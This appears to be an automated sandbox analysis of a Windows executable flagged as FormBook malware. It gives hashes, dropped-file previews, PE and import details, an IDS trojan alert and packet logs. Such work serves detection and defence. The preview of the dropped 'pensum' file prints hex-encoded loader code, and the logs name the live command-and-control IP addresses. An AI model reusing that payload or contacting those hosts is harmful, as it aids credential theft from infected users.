                                                          SSDEEP:6144:Tmn53woLrbQI+41Mo7fIoDycMSCouZUHS9drY/A:kNwo/bQH4jDxDycMSCtUHS9dYA
                                                          MD5:B137BE5FC54F6B724BA7062CBA8BFA92
                                                          SHA1:501423341C2EA96B2FAB4453006F3F6CD2A4CF78
                                                          SHA-256:E4C4FA743DA2E4FEB15378B568ACEA1E55A3596412139FF57FB697A7C2A0CF2B
                                                          SHA-512:EF72F289E2B70A28E954F3C2B8F100F3F8C7E435C3F41328A49ED55726F213F069B6C3535A503A1C471879560DBC452A873249A91236DCFA8CAA652423BFD718
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:.m.c.IWHHh.M.....1E..`3B...RFD7B1FIWHH0JCD7RFD7B1FIWHH0JC.7RFJ(.?F.^.i.K.....-DbA4&0:)]j %Y<)0. Tf;"&hY$c.x.f)X&ThDZBl0JCD7RF=6K.{)0.uP-.yW5.^...|)0.R..xW5.^...z)0..Y)+yW5.D7B1FIWH.uJC.6SF...hFIWHH0JC.7PGO6I1FYSHH0JCD7RF.#B1FYWHH.NCD7.FD'B1FKWHN0JCD7RFB7B1FIWHH.NCD5RFD7B1DI..H0ZCD'RFD7R1FYWHH0JCT7RFD7B1FIWHH0JCD7RFD7B1FIWHH0JCD7RFD7B1FIWHH0JCD7RFD7B1FIWHH0JCD7RFD7B1FIWHH0JCD7RFD7B1FIWHH0JCD7RFD7B1FIWHH0JCD7RFD7B1FIWHH0JCD7RFjC'I2IWH.?NCD'RFD'F1FYWHH0JCD7RFD7B1fIW(H0JCD7RFD7B1FIWHH0JCD7RFD7B1FIWHH0JCD7RFD7B1FIWHH0JCD7RFD7B1FIWHH0JCD7RFD7B1FIWHH0JCD7RFD7B1FIWHH0JCD7RFD7B1FIWHH0JCD7RFD7B1FIWHH0JCD7RFD7B1FIWHH0JCD7RFD7B1FIWHH0JCD7RFD7B1FIWHH0JCD7RFD7B1FIWHH0JCD7RFD7B1FIWHH0JCD7RFD7B1FIWHH0JCD7RFD7B1FIWHH0JCD7RFD7B1FIWHH0JCD7RFD7B1FIWHH0JCD7RFD7B1FIWHH0JCD7RFD7B1FIWHH0JCD7RFD7B1FIWHH0JCD7RFD7B1FIWHH0JCD7RFD7B1FIWHH0JCD7RFD7B1FIWHH0JCD7RFD7B1FIWHH0JCD7RFD7B1FIWHH0JCD7RFD7B1FIWHH0JCD7RFD7B1FIWHH0JCD7RFD7B1FIWHH0JCD7RFD7B1FIWHH0JCD7RFD7B1FIWHH0JCD7RFD7B1FIWHH0JCD7RFD7B1FIWHH0JCD7RFD7B1FIWH

                                                          C:\Users\user\AppData\Local\Temp\autE77D.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\7RsDGpyOQk.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):9816
                                                          Entropy (8bit):7.600873196675209
                                                          Encrypted:false
                                                          SSDEEP:192:65jwEiq+uHKrLM0IltC6jQqSa6fYHToxycOWt/mPsokdW05Ju:I6q+Brw/gjYKycJt/mXcxJu
                                                          MD5:C93E02FAC913657BF437358D4AE797B8
                                                          SHA1:923E07D41F9C315D0257BAE8D99587A307F31B8D
                                                          SHA-256:B0BBB5AA1D3C82048A935AC92E14D73FE086A1559C3B02377349762EEABE3F8B
                                                          SHA-512:D6771FB074C90CDE16DADDFCF621FF20FCD2FEB66A93BC66F60F8BAA92A8F9A90BC4D0890A7775D841CA79130D38A4CB5438D68F97486D6BFCE344EABE2C704C
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:EA06..pT.Q&...8.M.z,.D.Lf....y9......o3.N&T...5...j..m1..f.Y..cD.L'.....3.N(s...m9...s.5..8.L/.Y...e..&6[...0.L..I..k7.N&. ..a0.M.....q4.Nf.P.....K..d.%...p.lY@.......c.Xf.0.o..b.L.`...,@. ...3+..d....s4.l&..........|....sa...`.........Y&.K0.....-vs5.M..2...N&.I...@.>..........$.0...fx. ..$l...I...#..$6...... ..... .Z...a.5..&.).....L.j.;$....M.j.;$....X@j.;%....Y@j.;,.....j.e.|f #^...j......l.....l.5....>0..Xf....M.^....$zn.....G..I....C...M.|........}S{....7...| l..P..........0...`>;..c7.6..{......=..7..............6,......b...,S ...i5.M.4.b..i|v)....b.h.,@..%........9....c...|3Y..h......._......@.>K...,v[..q5.M,.@..i7.X......9....2.......,.`....3.,.i8........}.k(.f..@..M&V....7.,.x....&.......0.......Fh...Fb.....3.."a9...`....,vb.....cd.X..P.Fl.Y.$..c. ....I...d..f.!...,vd......8..P.......0.....2...y...D.......c.0.......b.<NA...NM..;4.X.q1..&@Q..B.Y.ah......Yl.i..."..Bvj.........ic..'3Y..'f.....,j.1........C.`....7b.., .p..T.......Y,Vi......@

                                                          C:\Users\user\AppData\Local\Temp\pensum

                                                          Download File
                                                          Process:C:\Users\user\Desktop\7RsDGpyOQk.exe
                                                          File Type:ASCII text, with very long lines (28756), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):28756
                                                          Entropy (8bit):3.586444885340032
                                                          Encrypted:false
                                                          SSDEEP:768:miTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbX+IZ6Gg4vfF3if6gyHZ:miTZ+2QoioGRk6ZklputwjpjBkCiw2Rz
                                                          MD5:39CC20E0608C4A2B47D74CE439DCBF84
                                                          SHA1:2B0462EBA6054DF581D40AE0624780B6E8981B53
                                                          SHA-256:13C96E8C4122C32D77A40D952285FB8484A4023D3FBF68A0272D0AB3BFC77DBC
                                                          SHA-512:950272122C93ADCD04BEFBA5686A36A3269830876CABA427DA68F3D8195B8ABB9173FACD264CAA98C8C8CB373B823A063A82148454BEA2089C1AFCD60173B703
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:8D6804F867D7E3ED21599F86932DA5673082A29A59B06B261C54E6F1DF089BBB368C973697738FDC880x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffff

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.053685704500323
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:7RsDGpyOQk.exe
                                                          File size:1'230'848 bytes
                                                          MD5:cf27e45be1b40dd336d102e1449046d9
                                                          SHA1:5c0dcbb199502fed8f89d65cd3c2c5be9e0348f1
                                                          SHA256:24f58a84a8acf1b1e52fe60798e03b2e3b97d5f52628d7c40ffcc9b7937b9b12
                                                          SHA512:10083faa57f70cc177303b60e6a149b024ddb272c73a2778a9984caf1e062f148161883d88057615ed7f3f197b649b585da2098d1d94ade8eb7ee38da0f2b3d1
                                                          SSDEEP:24576:9AHnh+eWsN3skA4RV1Hom2KXMmHac78r8QW7NjIssyY5:ch+ZkldoPK8YaE8r8b7NjA
                                                          TLSH:7D45AD02B391C035FFAA92735B26F62156BD7D294133852F22D83DBABDB10B1163D663
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                                                          File Icon

                                                          Icon Hash:d4a684988ca4a0c5

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x42800a
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x667AAD23 [Tue Jun 25 11:42:27 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:1
                                                          File Version Major:5
                                                          File Version Minor:1
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:1
                                                          Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                          Entrypoint Preview

                                                          Instruction
                                                          call 00007FCF5CF0BC2Dh
                                                          jmp 00007FCF5CEFE9E4h
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push edi
                                                          push esi
                                                          mov esi, dword ptr [esp+10h]
                                                          mov ecx, dword ptr [esp+14h]
                                                          mov edi, dword ptr [esp+0Ch]
                                                          mov eax, ecx
                                                          mov edx, ecx
                                                          add eax, esi
                                                          cmp edi, esi
                                                          jbe 00007FCF5CEFEB6Ah
                                                          cmp edi, eax
                                                          jc 00007FCF5CEFEECEh
                                                          bt dword ptr [004C41FCh], 01h
                                                          jnc 00007FCF5CEFEB69h
                                                          rep movsb
                                                          jmp 00007FCF5CEFEE7Ch
                                                          cmp ecx, 00000080h
                                                          jc 00007FCF5CEFED34h
                                                          mov eax, edi
                                                          xor eax, esi
                                                          test eax, 0000000Fh
                                                          jne 00007FCF5CEFEB70h
                                                          bt dword ptr [004BF324h], 01h
                                                          jc 00007FCF5CEFF040h
                                                          bt dword ptr [004C41FCh], 00000000h
                                                          jnc 00007FCF5CEFED0Dh
                                                          test edi, 00000003h
                                                          jne 00007FCF5CEFED1Eh
                                                          test esi, 00000003h
                                                          jne 00007FCF5CEFECFDh
                                                          bt edi, 02h
                                                          jnc 00007FCF5CEFEB6Fh
                                                          mov eax, dword ptr [esi]
                                                          sub ecx, 04h
                                                          lea esi, dword ptr [esi+04h]
                                                          mov dword ptr [edi], eax
                                                          lea edi, dword ptr [edi+04h]
                                                          bt edi, 03h
                                                          jnc 00007FCF5CEFEB73h
                                                          movq xmm1, qword ptr [esi]
                                                          sub ecx, 08h
                                                          lea esi, dword ptr [esi+08h]
                                                          movq qword ptr [edi], xmm1
                                                          lea edi, dword ptr [edi+08h]
                                                          test esi, 00000007h
                                                          je 00007FCF5CEFEBC5h
                                                          bt esi, 03h

                                                          Rich Headers

                                                          Programming Language:
                                                          • [ASM] VS2013 build 21005
                                                          • [ C ] VS2013 build 21005
                                                          • [C++] VS2013 build 21005
                                                          • [ C ] VS2008 SP1 build 30729
                                                          • [IMP] VS2008 SP1 build 30729
                                                          • [ASM] VS2013 UPD5 build 40629
                                                          • [RES] VS2013 build 21005
                                                          • [LNK] VS2013 UPD5 build 40629

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x620fc.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x12b0000x7134.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x8dfdd0x8e000310e36668512d53489c005622bb1b4a9False0.5735602580325704data6.675248351711057IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata0x8f0000x2fd8e0x2fe00748cf1ab2605ce1fd72d53d912abb68fFalse0.32828818537859006data5.763244005758284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0xbf0000x8f740x5200aae9601d920f07080bdfadf43dfeff12False0.1017530487804878data1.1963819235530628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0xc80000x620fc0x62200f3bf25d062cf64311056bee6f07bde13False0.8252985668789808data7.591179161672578IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x12b0000x71340x7200f04128ad0f87f42830e4a6cdbc38c719False0.7617530153508771data6.783955557128661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_ICON0xc84580x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                          RT_ICON0xc85800x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                          RT_ICON0xc86a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                          RT_ICON0xc87d00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishGreat Britain0.07945403998580386
                                                          RT_MENU0xd8ff80x50dataEnglishGreat Britain0.9
                                                          RT_STRING0xd90480x594dataEnglishGreat Britain0.3333333333333333
                                                          RT_STRING0xd95dc0x68adataEnglishGreat Britain0.2747909199522103
                                                          RT_STRING0xd9c680x490dataEnglishGreat Britain0.3715753424657534
                                                          RT_STRING0xda0f80x5fcdataEnglishGreat Britain0.3087467362924282
                                                          RT_STRING0xda6f40x65cdataEnglishGreat Britain0.34336609336609336
                                                          RT_STRING0xdad500x466dataEnglishGreat Britain0.3605683836589698
                                                          RT_STRING0xdb1b80x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                          RT_RCDATA0xdb3100x4e8cedata1.0003294565210634
                                                          RT_GROUP_ICON0x129be00x14dataEnglishGreat Britain1.25
                                                          RT_GROUP_ICON0x129bf40x14dataEnglishGreat Britain1.25
                                                          RT_GROUP_ICON0x129c080x14dataEnglishGreat Britain1.15
                                                          RT_GROUP_ICON0x129c1c0x14dataEnglishGreat Britain1.25
                                                          RT_VERSION0x129c300xdcdataEnglishGreat Britain0.6181818181818182
                                                          RT_MANIFEST0x129d0c0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                          Imports

                                                          DLLImport
                                                          WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                          VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                          COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                          MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                          WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                          PSAPI.DLLGetProcessMemoryInfo
                                                          IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                          USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                          UxTheme.dllIsThemeActive
                                                          KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                          USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                          GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                          COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                          ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                          SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                          ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                          OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                          Possible Origin

                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishGreat Britain

                                                          Network Behavior

                                                          Snort IDS Alerts

                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                          07/03/24-15:57:00.193570TCP2856318ETPRO TROJAN FormBook CnC Checkin (POST) M44973880192.168.2.476.223.105.230

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jul 3, 2024 15:56:44.052105904 CEST4973680192.168.2.4185.106.178.60
                                                          Jul 3, 2024 15:56:44.056984901 CEST8049736185.106.178.60192.168.2.4
                                                          Jul 3, 2024 15:56:44.057132006 CEST4973680192.168.2.4185.106.178.60
                                                          Jul 3, 2024 15:56:44.059632063 CEST4973680192.168.2.4185.106.178.60
                                                          Jul 3, 2024 15:56:44.068073988 CEST8049736185.106.178.60192.168.2.4
                                                          Jul 3, 2024 15:56:44.945144892 CEST8049736185.106.178.60192.168.2.4
                                                          Jul 3, 2024 15:56:44.945270061 CEST8049736185.106.178.60192.168.2.4
                                                          Jul 3, 2024 15:56:44.945353031 CEST4973680192.168.2.4185.106.178.60
                                                          Jul 3, 2024 15:56:44.948889971 CEST4973680192.168.2.4185.106.178.60
                                                          Jul 3, 2024 15:56:44.954463005 CEST8049736185.106.178.60192.168.2.4
                                                          Jul 3, 2024 15:57:00.185970068 CEST4973880192.168.2.476.223.105.230
                                                          Jul 3, 2024 15:57:00.191063881 CEST804973876.223.105.230192.168.2.4
                                                          Jul 3, 2024 15:57:00.191216946 CEST4973880192.168.2.476.223.105.230
                                                          Jul 3, 2024 15:57:00.193569899 CEST4973880192.168.2.476.223.105.230
                                                          Jul 3, 2024 15:57:00.198550940 CEST804973876.223.105.230192.168.2.4
                                                          Jul 3, 2024 15:57:00.665910006 CEST804973876.223.105.230192.168.2.4
                                                          Jul 3, 2024 15:57:00.665935993 CEST804973876.223.105.230192.168.2.4
                                                          Jul 3, 2024 15:57:00.666059017 CEST4973880192.168.2.476.223.105.230
                                                          Jul 3, 2024 15:57:00.666773081 CEST804973876.223.105.230192.168.2.4
                                                          Jul 3, 2024 15:57:00.666903019 CEST4973880192.168.2.476.223.105.230
                                                          Jul 3, 2024 15:57:01.697953939 CEST4973880192.168.2.476.223.105.230
                                                          Jul 3, 2024 15:57:02.741179943 CEST4973980192.168.2.476.223.105.230
                                                          Jul 3, 2024 15:57:02.746213913 CEST804973976.223.105.230192.168.2.4
                                                          Jul 3, 2024 15:57:02.746301889 CEST4973980192.168.2.476.223.105.230
                                                          Jul 3, 2024 15:57:02.753685951 CEST4973980192.168.2.476.223.105.230
                                                          Jul 3, 2024 15:57:02.758548021 CEST804973976.223.105.230192.168.2.4
                                                          Jul 3, 2024 15:57:03.250248909 CEST804973976.223.105.230192.168.2.4
                                                          Jul 3, 2024 15:57:03.250319004 CEST804973976.223.105.230192.168.2.4
                                                          Jul 3, 2024 15:57:03.250332117 CEST804973976.223.105.230192.168.2.4
                                                          Jul 3, 2024 15:57:03.250391960 CEST4973980192.168.2.476.223.105.230
                                                          Jul 3, 2024 15:57:03.250391960 CEST4973980192.168.2.476.223.105.230
                                                          Jul 3, 2024 15:57:04.260433912 CEST4973980192.168.2.476.223.105.230
                                                          Jul 3, 2024 15:57:05.278815985 CEST4974080192.168.2.476.223.105.230
                                                          Jul 3, 2024 15:57:05.283912897 CEST804974076.223.105.230192.168.2.4
                                                          Jul 3, 2024 15:57:05.284006119 CEST4974080192.168.2.476.223.105.230
                                                          Jul 3, 2024 15:57:05.286130905 CEST4974080192.168.2.476.223.105.230
                                                          Jul 3, 2024 15:57:05.291018963 CEST804974076.223.105.230192.168.2.4
                                                          Jul 3, 2024 15:57:05.291053057 CEST804974076.223.105.230192.168.2.4
                                                          Jul 3, 2024 15:57:05.291065931 CEST804974076.223.105.230192.168.2.4
                                                          Jul 3, 2024 15:57:05.291163921 CEST804974076.223.105.230192.168.2.4
